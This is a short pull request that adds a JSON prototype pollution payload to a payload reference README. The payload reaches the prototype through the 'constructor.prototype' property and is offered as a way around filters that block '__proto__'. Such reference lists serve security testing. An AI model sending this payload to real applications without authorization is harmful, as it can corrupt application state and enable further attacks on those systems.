### PR TITLE
adding the payload for Polluting the prototype via the `constructor`  property in JSON input

### DIFF
--- a/Prototype Pollution/README.md
+++ b/Prototype Pollution/README.md
@@ -99,6 +99,19 @@ Asynchronous payload for NodeJS.
 }
 ```
 
+Polluting the prototype via the `constructor` property instead.
+
+```js
+{
+    "constructor": {
+        "prototype": {
+            "foo": "bar",
+            "json spaces": 10
+        }
+    }
+}
+```
+
 
 ### Prototype Pollution in URL
 


### PR DESCRIPTION
Somtimes `__proto__` property may not work, so adding the payload for Polluting the prototype via the `constructor` property in JSON input